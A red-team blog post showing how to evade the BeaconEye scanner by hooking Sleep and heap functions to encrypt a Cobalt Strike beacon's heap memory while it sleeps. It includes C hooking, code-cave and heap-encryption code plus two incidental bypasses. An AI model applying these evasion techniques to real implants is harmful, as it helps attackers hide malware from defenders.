Hook Heaps and Live Free

December 8, 2021 Arash Parsa


I wanted to write this blog post to talk a bit about Cobalt Strike, function hooking and the Windows heap.  We will be targeting BeaconEye (https://github.com/CCob/BeaconEye) as our detection tool to bypass.

Recently, I saw lots of tweets from MDSec Labs regarding NightHawk and some of its magic. I was inspired to try to re-create some of this magic within my own dropper to both understand it better and try to create a competitive dropper within my own Red Team kit.  I decided the best place to start would be with encrypting heap allocations.

Let’s talk a bit about why we want to encrypt heap allocations. Something I’m not going to go into too deeply is the difference between the stack and the heap. The stack is locally scoped and usually falls out of scope when a function completes. This means items set on the stack during the run of a function fall off the stack when the function returns and completes; this obviously isn’t great for variables you’d like to keep long term in memory. This is where the heap comes in. The heap is meant to be more of a long-term memory storage solution. Allocations on the heap stay on the heap until your code manually frees them. This can also lead to memory leaks if you continually allocate data onto the heap without ever freeing anything.

Based on this description, let’s consider some of the data the heap would contain. The heap would potentially contain long-term configuration information such as Cobalt Strike’s sacrificial process, sleep time, paths for callbacks, etc. Knowing this, it’s obvious we’d like to protect this data. So, then you say, “but wait, there’s sleep and obfuscate!” but (unless I did something wrong) it does not appear to actually encrypt heap strings. This means if your Cobalt Strike agent is running in memory, any defender could see your configuration in plain text in the process’s heap space. We, as defenders, would not even need to identify your injected thread; we could easily HeapWalk() (https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapwalk) all allocations and search for something as simple as “%windir%” to try to identify your sacrificial process (obviously, this can be changed and isn’t a great hard indicator, but you get the general idea; example code below):

static PROCESS_HEAP_ENTRY entry;
BOOL IdentifyStringInHeap() {
    BOOL found = FALSE;
    SecureZeroMemory(&entry, sizeof(entry));
    while (HeapWalk(GetProcessHeap(), &entry)) {
        if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
            // Find str in the allocated space by iterating over its whole size
            // lpData is the pointer and cbData is the size
            // findStr is your own search helper; assumed here to return non-zero on a match
            if (findStr("%windir%", entry.lpData, entry.cbData)) {
                found = TRUE;
            }
        }
    }
    return found;
}
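The findStr helper is not shown in this post. As a minimal sketch, assuming it takes a NUL-terminated needle plus a raw pointer and size and returns non-zero on a match, it could look like the following (the signature and return convention are my assumptions, not something defined by HeapWalk()):

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical findStr: returns 1 if the NUL-terminated needle occurs anywhere
 * in the first `size` bytes of `data`, otherwise 0. Heap blocks are raw bytes,
 * so strstr() is not a good fit: it stops at the first 0x00 byte and can read
 * past the end of the block. */
int findStr(const char *needle, const void *data, size_t size) {
    assert(needle != NULL && data != NULL);
    const unsigned char *bytes = (const unsigned char *)data;
    size_t len = strlen(needle);
    if (len == 0 || len > size) {
        return 0;
    }
    /* Compare the needle against every window that fits inside the block. */
    for (size_t i = 0; i + len <= size; i++) {
        if (memcmp(bytes + i, needle, len) == 0) {
            return 1;
        }
    }
    return 0;
}
```

Bounding the search by the block size is the important part, since cbData is the only thing that tells you where one allocation ends.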

As you can see, this is quite an alarming thought. Now that we know about this problem, we must venture to resolve it. This raises the question: how?

We have several potential resolutions and problems that occur with each one. Let’s start with the case of the standalone EXE, as this one is far simpler. This binary is your Cobalt Strike payload and nothing else. In this case, we can very easily accomplish our goal as the only thing using the heap is our evil payload. Using the previously mentioned HeapWalk() function, we can iterate over every allocation in the heap and encrypt it! To prevent errors, we can suspend all threads before encrypting the heap and then resume all threads post encryption.

  • An important note: Even if you think your program is single threaded, Windows appears to provide threads in the background that do garbage collection and other types of functions for utilities like RPC and WININET. If you don’t suspend those threads, they will crash your process as they try to reference encrypted allocations. Here is a sample crash below:

image1

Windows Background Threads

image-2

wininet.dll Thread Crash

In theory, this is an easy implementation! The last piece of the puzzle is how to invoke all of this when Cobalt Strike sleeps. The solution is simple.

Hooking

If we look at the IAT (Import Address Table) for the Cobalt Strike binary, we will see it leverages Kernel32.dll Sleep for its Sleep functionality.

image-3

Cobalt Strike Imports (Sleep is of Specific Interest)

All we need to do is hook Sleep in kernel32.dll and then alter the behavior in our hooked sleep to the following:

void WINAPI HookedSleep(DWORD dwMilliseconds) {
    DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
    HeapEncryptDecrypt();

    OldSleep(dwMilliseconds);

    HeapEncryptDecrypt();
    DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
}

Basically, we suspend all the threads and run our encryption routine which looks like the following:

static PROCESS_HEAP_ENTRY entry;
VOID HeapEncryptDecrypt() {
    SecureZeroMemory(&entry, sizeof(entry));
    while (HeapWalk(currentHeap, &entry)) {
        if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
            XORFunction(key, keySize, (char*)(entry.lpData), entry.cbData);
        }
    }
}

This creates a PROCESS_HEAP_ENTRY struct, zeros it out every call, then walks the heap and puts the data in the struct. We then check the flags of the current heap entry and verify if it is allocated so that we only encrypt the allocations.
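XORFunction itself is left to the reader. A minimal sketch, assuming a repeating-key XOR with the same argument order as the call above (the parameter types are my guess), might be:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical XORFunction: XORs `size` bytes of `data` in place with a
 * repeating key. Because XOR is its own inverse, calling it a second time
 * with the same key restores the original bytes. */
void XORFunction(const unsigned char *key, size_t keySize, char *data, size_t size) {
    assert(key != NULL && keySize > 0);
    for (size_t i = 0; i < size; i++) {
        data[i] = (char)((unsigned char)data[i] ^ key[i % keySize]);
    }
}
```

That symmetry is why the same HeapEncryptDecrypt() routine can be called once before sleeping and once after: the first pass scrambles every busy block and the second pass undoes it.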

Then we run the original/old sleep function which will be created as part of our hooking functionality and then decrypt before resuming threads. That way we can prevent crashes when the allocations are once again referenced. In all, it’s a fairly simple process. What we haven’t touched on is the hooking capability.

First off, what is function hooking? Function hooking means we are rerouting calls to a function such as Sleep() within a process space to run our arbitrary function in memory instead. By doing this, we can change the function’s behavior, observe the arguments being called (since our arbitrary function is now called, we can print the arguments passed to it, for example) and even prevent the function from working at all. In many cases, this is how EDRs work to monitor and alert on suspicious behavior. They hook what they consider interesting functions, such as CreateRemoteThread, and log all the arguments to alert on suspicious calls later.

Let’s talk about how to hook a function. To me, this was the most fun and interesting part of the whole experience. There are many ways to accomplish this, but I’m only going to mention two and go in depth on one. The two techniques I will mention are IAT hooking and Trampoline Patching (it’s probably not the right term, but I’m not quite sure what is).

IAT Hooking

The idea behind IAT hooking is simple. Every executable image loaded in a process has what’s called an Import Address Table. This table contains a list of DLLs and the relevant function pointers that have been imported by the binary for usage. The recommended and most stable way of hooking is to walk the Import Address Table, identify the DLL you are trying to hook, identify the function you would like to hook and overwrite its function pointer with a pointer to your arbitrary hooked function. Whenever the process calls the function, it will look up the pointer and call your function instead. If you would like to call the old function as part of your hooked function, you can store the old pointer. An example already exists at ired.team: https://www.ired.team/offensive-security/code-injection-process-injection/import-adress-table-iat-hooking.
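To make the pointer swap concrete, here is a toy model of the idea. It is not a real IAT walker: the import_entry table, hook_import and the fake Sleep functions are all hypothetical stand-ins, and a real implementation would parse the PE import directory and change page protections before writing.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef int (*generic_fn)(int);

/* Toy stand-in for one import: a name plus the slot the program calls through. */
struct import_entry {
    const char *name;
    generic_fn  target;
};

/* Overwrites the slot for `name` and returns the previous pointer,
 * or NULL when the name is not imported at all. */
generic_fn hook_import(struct import_entry *table, size_t count,
                       const char *name, generic_fn replacement) {
    assert(table != NULL && name != NULL && replacement != NULL);
    for (size_t i = 0; i < count; i++) {
        if (strcmp(table[i].name, name) == 0) {
            generic_fn previous = table[i].target;
            table[i].target = replacement;
            return previous;
        }
    }
    return NULL;
}

int hook_calls = 0;           /* how many times the hook was entered */
generic_fn old_sleep = NULL;  /* saved original pointer */

/* Pretend Sleep: just reports the requested duration. */
int real_sleep(int ms) { return ms; }

/* The hook observes the call, then forwards to the saved original. */
int hooked_sleep(int ms) {
    hook_calls++;
    return old_sleep(ms);
}
```

After `old_sleep = hook_import(table, count, "Sleep", hooked_sleep);`, every call made through the table lands in hooked_sleep first, while code that resolved the function some other way is untouched. That is the limitation discussed next.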

Now there are advantages and disadvantages to this method. The two major obvious advantages are that it is very simple to implement and it’s very stable. You are changing what function is called and that’s it, you aren’t altering anything with a big risk of crashing.  Now let’s talk about the disadvantages.

If anything uses GetProcAddress() to resolve the function, it won’t be in the IAT (though I believe you can perform EAT hooking to resolve that but that’s for another time). It’s a very targeted hooking method that can be a benefit, but it is a double-edged sword if you want to monitor a wider range of calls (such as being able to hook NtCreateThreadEx vs just CreateRemoteThread where you may miss lots of calls if they go lower level).  It’s also much easier to detect in theory.

This is simple enough; I won’t go into it too much. Here’s another post on the matter as well: https://guidedhacking.com/threads/how-to-hook-import-address-table-iat-hooking.13555/

Trampoline Patching

Let’s now talk about Trampoline Patching. Trampoline Patching is much more difficult to pull off, much more difficult to get stable, and can take a very long time to do universally for x64 due to a lot of relative addressing that must be resolved. Thankfully, someone already took the time to make an open-source library that performs what’s required to accomplish all this in a very stable manner: https://github.com/TsudaKageyu/minhook.

But for the sake of learning, let’s go ahead and look at how this kind of hooker works, so we could re-implement our own if we wanted. At first, I had considered sharing my own implementation, but I decided it’d be an exercise best left to the reader (especially as other implementations for study already exist). Instead, we will debug my implementation to better understand how this patching mechanism works.

The idea overall works like this: wall of text incoming! We will resolve the base of the function using GetProcAddress and LoadLibrary. We will then resolve the first X number of instructions that are valid assembly and add up to a minimum of five bytes. To be more specific, we will be using a very common technique that uses the five-byte relative jump opcode (E9) to jump to a location ±2GB from the function base that will then jump to our arbitrary function. Obviously, for this to work we need to overwrite the first five bytes of the function. If we do that, we break the original function if we ever need to call it again. To ensure we can restore the old functionality if needed, we must save the first instruction, which we will later write into a code cave as part of a trampoline that will run it for us and then jump back to the function’s next instruction. But if the first instruction is only four bytes, writing five bytes breaks the first opcode of the second instruction. In that case we need to store the first two instructions in our trampoline, and the trampoline will run the first two instructions and jump back to the third instruction to continue execution. Wherever this trampoline lives will be the new pointer for the original function that is being hooked. So, the original function pointer now runs like this ->

OldFunction = Trampoline -> JMP to original location of function + size of trampoline

This code cave will also have a jump to the location of our arbitrary function somewhere; the relative five-byte jump written at the base of the original function jumps to this location which then jumps to the arbitrary function like this ->

Base of old function jmps -> cave that contains the following assembly
FF 25 00 00 00 00 [JMP QWORD PTR [RIP+0]]

00 00 00 00 00 00 00 00 [This is an arbitrary pointer to your function, in your C it would be &ArbitraryFunction]

With this, we now have a way to run our arbitrary function when the old function is called and call the old/original function as we need.
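The 14-byte stub that sits in the cave can be assembled by hand. The sketch below is one way to lay it out, assuming x64; write_abs_jmp and ABS_JMP_SIZE are hypothetical names:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ABS_JMP_SIZE 14

/* Writes FF 25 00 00 00 00 (JMP QWORD PTR [RIP+0]) followed by the 8-byte
 * absolute target. The zero displacement makes the CPU read the pointer that
 * is stored immediately after the instruction. Returns the bytes written. */
size_t write_abs_jmp(uint8_t *out, uint64_t target) {
    assert(out != NULL);
    static const uint8_t opcode[6] = {0xFF, 0x25, 0x00, 0x00, 0x00, 0x00};
    for (size_t i = 0; i < sizeof(opcode); i++) {
        out[i] = opcode[i];
    }
    /* Pointer bytes go in little-endian order. */
    for (size_t i = 0; i < 8; i++) {
        out[6 + i] = (uint8_t)(target >> (8 * i));
    }
    return ABS_JMP_SIZE;
}
```

Unlike the E9 jump, this form has no range limit, which is why it is used for the second hop from the cave to wherever the compiler placed your hook function.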

Let’s now take a look at this while debugging. We will hook MessageBoxA and compare what it looks like clean vs. hooked.

First, we hook MessageBoxA. The code looks something like:

Hook("user32.dll", "MessageBoxA", (LPVOID)NewMessageBoxA, (FARPROC*)&OldMessageBoxA);

MessageBoxA lives in user32.dll, so if we want to get its base address, that’s where we must find it. With this, we find the base address, patch everything, add some code to a cave, resolve the relative jump and store the trampoline in OldMessageBoxA().

Our arbitrary/hooked MessageBoxA function will look like this:

int WINAPI NewMessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {
    return OldMessageBoxA(hWnd, "HOOKED", lpCaption, uType);
}

We need to match the return type and arguments, and here we will run the original MessageBoxA but we will alter the text to always say “HOOKED” no matter what.

Now let’s see what it looks like before and after.

BEFORE

image-4

image-5

 

Before Patching Unhooked message Box

 

AFTER

image-6

image-7

After Patching Hooked Message Box

So MessageBoxA is a near-perfect example of the issue previously mentioned. As you can see, in the BEFORE screenshot the first instruction is only four bytes. This means we’ll need to store the first two instructions, since our five-byte relative jump overwrites the first and spills into the second. We do not need to alter the remaining bytes because our trampoline will execute the two instructions we stored and then jump back to location 0x00007FF8EF70AC27. Let’s continue in the debugger to see what the new hooked functionality looks like. We will start right after running the JMP:

image-8

Jump to Hooked Function

Here we see two 00s first. I do this so that, when writing multiple trampolines to the cave, we don’t overwrite the trailing 00 00 of a previously written function pointer. Next, we see FF 25 00 00 00 00, which is the JMP QWORD PTR instruction. Right after, you will see the eight bytes that are the pointer to our hooked function! If we execute this instruction, we will see:

image-9

First Instruction in Hooked Function

 

And finally:

image-10

Inside Hooked Function

Here we can see we are in our hooked function. The hooked function only runs and returns the old function, so let’s continue execution into the old function:

image-11

Call the Old Function

Let’s see where that leads:

image-12

Trampoline

If you look at this image, you can see we are executing the first two instructions we overwrote! Right after the copied bytes, we do a second JMP QWORD PTR to the location of the OriginalFunction+7 (since the size of the trampoline is seven bytes in this instance). This will put us right at the start of the third instruction. Let’s see:

image-13

Continued Execution

Here you can see we are now at the CMP instruction, continuing execution right from where we left off.
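The trampoline layout we just stepped through can be sketched in a few lines. This assumes you already know the instruction lengths (a real hooker gets them from a length disassembler) and that the stolen instructions contain no RIP-relative operands, which would need fixing up when moved. The helper names are hypothetical, and the base address used in the note below is simply the return location quoted above minus seven.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Adds up whole-instruction lengths until at least `needed` bytes are
 * covered. Returns the number of bytes to steal, or 0 if the supplied
 * instructions never reach `needed`. */
size_t stolen_length(const size_t *insn_lengths, size_t count, size_t needed) {
    assert(insn_lengths != NULL);
    size_t total = 0;
    for (size_t i = 0; i < count; i++) {
        total += insn_lengths[i];
        if (total >= needed) {
            return total;
        }
    }
    return 0;
}

/* Trampoline = stolen bytes + FF 25 00 00 00 00 + address of the first
 * instruction that was NOT overwritten. Returns the trampoline size. */
size_t build_trampoline(uint8_t *out, const uint8_t *original_bytes,
                        size_t stolen, uint64_t original_addr) {
    assert(out != NULL && original_bytes != NULL && stolen > 0);
    uint64_t resume = original_addr + stolen;
    memcpy(out, original_bytes, stolen);
    out[stolen] = 0xFF;
    out[stolen + 1] = 0x25;
    memset(out + stolen + 2, 0x00, 4);
    for (size_t i = 0; i < 8; i++) {
        out[stolen + 6 + i] = (uint8_t)(resume >> (8 * i));
    }
    return stolen + 14;
}
```

With instruction lengths of 4 and 3, stolen_length() asked for five bytes returns 7, and a trampoline built for base 0x00007FF8EF70AC20 ends with a pointer to 0x00007FF8EF70AC27, the same resume address seen in the debugger.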

Through this process, you can see how utilities like minhook work. Now, you can either implement it yourself like I did or just use something stable like minhook. In case you are feeling adventurous, I’ll give you a freebie of some non-optimized cave-finding code that identifies any cave within two gigs forward of the function (you’ll need to figure some parts out, nothing in life is completely free):

// Upper bound = 5-byte jump + maximum positive rel32 (0x7FFFFFFF).
// This assumes i is declared as a 64-bit type; a 32-bit int can never reach it.
for (i = 0; i < 2147483652; i++) {
    currentByte = (LPBYTE)funcAddress + i;
    if (memcmp(currentByte, "\x00", 1) == 0) {
        caveLength += 1;
        LPBYTE newByteForward = currentByte + 1;
        // Count how far the run of zero bytes extends
        while (memcmp(newByteForward, "\x00", 1) == 0) {
            caveLength++;
            newByteForward++;
        }
        if (caveLength >= totalSize) {
            // Keep two zero bytes in front of us so we don't clip a previous pointer
            while (memcmp(currentByte - 1, "\x00", 1) != 0 || memcmp(currentByte - 2, "\x00", 1) != 0) {
                currentByte++;
            }
            // Make sure the section is executable or try again
            MEMORY_BASIC_INFORMATION info;
            VirtualQuery(currentByte, &info, sizeof(info));
            if (info.AllocationProtect == PAGE_EXECUTE_WRITECOPY || info.AllocationProtect == PAGE_EXECUTE_READ || info.AllocationProtect == PAGE_EXECUTE_READWRITE) {
                break;
            }
            else {
                i += caveLength;
                caveLength = 0;
                continue;
            }
        }
        else {
            i += caveLength;
            caveLength = 0;
            continue;
        }
    }
}
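If you want to reason about the search logic away from a live process, the core of it is just "find a long enough run of zero bytes". Here is a minimal, platform-independent sketch over an in-memory buffer; find_cave is a hypothetical helper and deliberately leaves out the VirtualQuery protection check and the two-byte padding used above:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first run of at least `wanted` zero bytes inside
 * region[0..size), or -1 when no such run exists. */
long find_cave(const uint8_t *region, size_t size, size_t wanted) {
    assert(region != NULL && wanted > 0);
    size_t run = 0;
    for (size_t i = 0; i < size; i++) {
        if (region[i] == 0x00) {
            run++;
            if (run == wanted) {
                /* i is the last byte of the run; step back to its start. */
                return (long)(i + 1 - wanted);
            }
        } else {
            run = 0;
        }
    }
    return -1;
}
```

Keep in mind that a run of zeros is only a candidate: in a real module those bytes may be live data rather than padding, so checking that the page is executable and otherwise unused is still on you.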

Putting the EXE Together

Time to put everything together and see what it looks like. Let’s go over the steps:

  1. Hook Sleep()
  2. In your hooked function, suspend all threads
  3. Encrypt all allocations using HeapWalk()
  4. Run the original Sleep() through the trampoline function
  5. Decrypt all allocations using HeapWalk()
  6. Resume all threads

I’m going to assume you have your own encryption, hooking and full thread suspension functionalities. Code should look something like this:

static PROCESS_HEAP_ENTRY entry;
VOID HeapEncryptDecrypt() {
    SecureZeroMemory(&entry, sizeof(entry));
    while (HeapWalk(currentHeap, &entry)) {
        if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
            XORFunction(key, keySize, (char*)(entry.lpData), entry.cbData);
        }
    }
}

static void(WINAPI* OriginalSleepFunction)(DWORD dwMilliseconds);
void WINAPI HookedSleepFunction(DWORD dwMilliseconds) {
    DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
    HeapEncryptDecrypt();

    OriginalSleepFunction(dwMilliseconds);

    HeapEncryptDecrypt();
    DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
}

int main()
{
    DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
    Hook("kernel32.dll", "Sleep", (LPVOID)HookedSleepFunction, (FARPROC*)&OriginalSleepFunction, true);
    if (!OriginalSleepFunction) {
        MessageBoxA(NULL, "Hooking Sleep failed.", "Status", MB_OK);
    }
    DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
    // Sleep is now hooked
    return 0;
}

Very straightforward. This code obviously doesn’t include your implant. You can either run the implant in the same process space by executing shellcode somehow, or you can turn this into a DLL and inject it into the beacon post execution. Since it uses HeapWalk(), it can encrypt past, present and future allocations all with no issues, only needing to hook Sleep() to begin the call.

Demo time! For this demo, we do no encryption for anything with a sleep of one or less.

image-14

EXE HeapWalk() Encryptor Demo

As you can see, first we do a sleep of 1, and BeaconEye catches our configuration.  We change the sleep to 5, and encrypting begins, successfully shutting down BeaconEye.

Remember, since this encrypts ALL heap allocations, this will NOT work as an injected thread, as the process it’s injected in will not function while Cobalt Strike is sleeping. Imagine injecting into explorer.exe, and every time beacon sleeps, all of Explorer just freezes. This solution obviously isn’t optimal when it comes time to inject as a thread. If we want something that will work as a thread, we will need to do way more work.

A demo can be found here: https://github.com/waldo-irc/LockdExeDemo.

Thread Targeted Heap Encryption: Considerations

Our new design will have to work with a separate thread. We will not be able to suspend additional threads; we can’t lock the heap, and the main process will need to continue functioning. This means when we inject a beacon thread, we will have to ensure that ALL encrypted allocations are from that thread only. If we properly target the thread, we can successfully avoid issues. So, how can we do this?

We now have hooking capabilities in our dropper. To manipulate the heap, there is a subset of functions called within Windows:

  1. HeapCreate()
  2. HeapAlloc()
  3. HeapReAlloc()
  4. HeapFree()
  5. HeapDestroy()

malloc and free within Windows, located in msvcrt.dll, are actually high-level wrappers for HeapAlloc() and HeapFree(), which are high-level wrappers for RtlAllocateHeap() and RtlFreeHeap(), the lowest-level functions within Windows that end up managing the heap directly.

image-15

Picture for Proof from Ghidra

This means if we hook RtlAllocateHeap(), RtlReAllocateHeap() and RtlFreeHeap(), we can keep track of everything being allocated and freed within heap space in Cobalt Strike. This is nice because by hooking these three functions, we can insert allocations and re-allocations in a map and remove them from a map when free is called. This still doesn’t solve our thread target problem, though, does it?

An easy fix! It turns out that if you call GetCurrentThreadId() from a hooked function, you actually get the thread ID of the calling thread. Using this, you can inject your beacon, get its thread ID and do something similar to below:

GlobalThreadId = GetCurrentThreadId(); // We get the thread ID of our dropper!
HookedHeapAlloc () {
    if (GlobalThreadId == GetCurrentThreadId()) { // If the calling ThreadId matches our initial thread id then continue
        // Insert allocation into a list
    }
}

Do this for the re-allocation and do removes for the free as well, and now you are targeting a thread! Easy so far. But remember that issue from before, the reason why we had to suspend other threads? WININET and RPC calls will still try to access encrypted memory before we decrypt it in time. There are a few options here, but I used what I think is an interesting one. Since the loaded shell code was neither a valid EXE nor DLL, I was able to target allocations from anything that made a call that originated from a module with no name.

For this mechanism to work, we need to resolve the module that made the function call. This can be done with the following code:

#include <intrin.h>
#pragma intrinsic(_ReturnAddress)

GlobalThreadId = GetCurrentThreadId(); // We get the thread ID of our dropper!

HookedHeapAlloc (Arg1, Arg2, Arg3) {
    LPVOID pointerToEncrypt = OldHeapAlloc(Arg1, Arg2, Arg3);
    if (GlobalThreadId == GetCurrentThreadId()) { // If the calling ThreadId matches our initial thread id then continue

        HMODULE hModule;
        char lpBaseName[256] = { 0 }; // Stays empty when the caller is not backed by a module

        if (::GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCSTR)_ReturnAddress(), &hModule) == 1) {
            ::GetModuleBaseNameA(GetCurrentProcess(), hModule, lpBaseName, sizeof(lpBaseName));
        }

        std::string modName = lpBaseName;
        std::transform(modName.begin(), modName.end(), modName.begin(),
                [](unsigned char c) { return std::tolower(c); });
        if (modName.find("dll") == std::string::npos && modName.find("exe") == std::string::npos) {
            // Insert pointerToEncrypt variable into a list
        }
    }
    return pointerToEncrypt; // The caller still needs its allocation
}

This uses the _ReturnAddress intrinsic together with GetModuleHandleEx and the flag GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS to identify what module is making this call. We can then convert the module name to a lower-case string, and if the string does not contain DLL or EXE, we go ahead and insert the allocation. With this, you have a stable list of allocations to encrypt on sleep. You will need to repeat this process for your hooked re-allocation.
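The name check itself is easy to test in isolation. A minimal sketch in plain C, assuming the module base name has already been resolved into a buffer that is left empty when no module backs the return address (is_unbacked_caller is a hypothetical helper name):

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Returns 1 when the module name contains neither "dll" nor "exe"
 * (case-insensitive), which is how unbacked shellcode shows up here:
 * its module name is simply empty. Names longer than 255 bytes are
 * truncated before the comparison. */
int is_unbacked_caller(const char *moduleName) {
    assert(moduleName != NULL);
    char lowered[256];
    size_t i = 0;
    for (; moduleName[i] != '\0' && i < sizeof(lowered) - 1; i++) {
        lowered[i] = (char)tolower((unsigned char)moduleName[i]);
    }
    lowered[i] = '\0';
    return strstr(lowered, "dll") == NULL && strstr(lowered, "exe") == NULL;
}
```

The check only behaves if the name buffer starts out zeroed. An uninitialized buffer after a failed module lookup could contain anything, including bytes that happen to spell "dll".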

For the encryption to run, you need to iterate the list and encrypt those allocations instead of doing HeapWalk(). This will depend on whether you decide to use a map, vector, linked list or something else. You want to store the pointer returned by the real HeapAlloc or ReAlloc into your array, iterate the array and encrypt the data there by size. Arg3 in the example above is size (https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc).
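As one possible shape for that bookkeeping, here is a minimal sketch using a fixed-size array. Every name in it is hypothetical. I went with a static array here rather than a container, on the assumption that anything which allocates from inside a heap hook risks calling straight back into the hook; a real version would also need a lock, since the hooks can be entered from several threads.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_TRACKED 1024

struct tracked_alloc {
    void  *ptr;   /* pointer returned by the real allocation function */
    size_t size;  /* requested size in bytes */
};

static struct tracked_alloc tracked[MAX_TRACKED];
static size_t tracked_count = 0;

/* Call from the alloc/realloc hooks. Updates the size when the pointer is
 * already known. Returns 0 if the pointer is NULL or the table is full. */
int track_alloc(void *ptr, size_t size) {
    if (ptr == NULL) {
        return 0;
    }
    for (size_t i = 0; i < tracked_count; i++) {
        if (tracked[i].ptr == ptr) {
            tracked[i].size = size;
            return 1;
        }
    }
    if (tracked_count == MAX_TRACKED) {
        return 0;
    }
    tracked[tracked_count].ptr = ptr;
    tracked[tracked_count].size = size;
    tracked_count++;
    return 1;
}

/* Call from the free hook (and for the old pointer when realloc moves it). */
void untrack_alloc(void *ptr) {
    for (size_t i = 0; i < tracked_count; i++) {
        if (tracked[i].ptr == ptr) {
            tracked[i] = tracked[tracked_count - 1]; /* swap-remove */
            tracked_count--;
            return;
        }
    }
}

/* Replacement for the HeapWalk() loop: XOR every tracked block in place. */
void xor_tracked(const unsigned char *key, size_t keySize) {
    assert(key != NULL && keySize > 0);
    for (size_t i = 0; i < tracked_count; i++) {
        unsigned char *data = (unsigned char *)tracked[i].ptr;
        for (size_t j = 0; j < tracked[i].size; j++) {
            data[j] ^= key[j % keySize];
        }
    }
}
```

The hooked Sleep then calls xor_tracked() before and after the real Sleep, exactly where HeapEncryptDecrypt() was called in the EXE version. Removing entries on free matters as much as adding them: XORing a block that has since been freed and reused by another thread is the kind of corruption this design is trying to avoid.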

So now we hook four different functions, insert allocations based on thread id into a vector, iterate the vector and encrypt each address on sleep. If successful, we should once again bypass BeaconEye.

It’s demo time! Again, for the purposes of this demo, we do no encryption for anything with a sleep of 1 or less.

image-16

Injecting into cmd.exe and Bypassing BeaconEye

image-17

Injecting into explorer.exe and it is Stable

Success! We can inject into any process and encrypt only our own thread’s heap; the process won’t crash just because we’re sleeping.

Additional Observations During the Journey

On this journey toward stable heap encryption, I made three additional interesting discoveries. Let’s go over each one.

The first two are additional BeaconEye bypasses. As with any tool, BeaconEye has its flaws. Completely by accident, I discovered two mechanisms that bypass BeaconEye’s capabilities completely.

The first is that injecting beacon into explorer.exe appears to bypass BeaconEye completely. Here’s the demo:

image-18

Explorer.exe BeaconEye Bypass

As you can see, injecting into cmd.exe is caught, but explorer.exe seems like it must be getting scanned ineffectively.

Additionally, initializing symbols in the binary also breaks BeaconEye completely with the following lines of code:

#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")

SymInitialize(GetCurrentProcess(), NULL, TRUE);

The demo:

image-19

Bypass BeaconEye with Symbols

Lastly, I noticed something a bit interesting … I’m not sure people are aware, but Cobalt Strike does absolutely no cleanup on heap allocations on exit. This means if you exit an injected Cobalt Strike thread and the process doesn’t restart, your configuration stays in memory as an extractable artifact.

Final Demo:

image-20

Heap Artifacts

Maybe with everything you’ve been taught in the blog post you could put something together to resolve this.

image-21

Cleaning up the Heap

As for blue teams, now you know exiting isn’t the end! I may have made some mistakes during this post. Feel free to let me know, and I’ll gladly make corrections. Education is the main goal after all. You can find me on Discord.

Thanks to

  • SecIdiot for helping me think through and troubleshoot a lot in general and teaching me about HeapWalk()
  • Mr.Un1k0d3r for teaching us about how to make malware in C and inspiring this with his hooking lesson
  • ForrestOrr for helping me learn about hooking and trampolines and walking me through the logic of heap encryption

Decided to add a small demo of at least the EXE after all.  Here it is: https://github.com/waldo-irc/LockdExeDemo

In my next post, I would like to look into other hooking capabilities/ideas that could help us do a few more fun things.
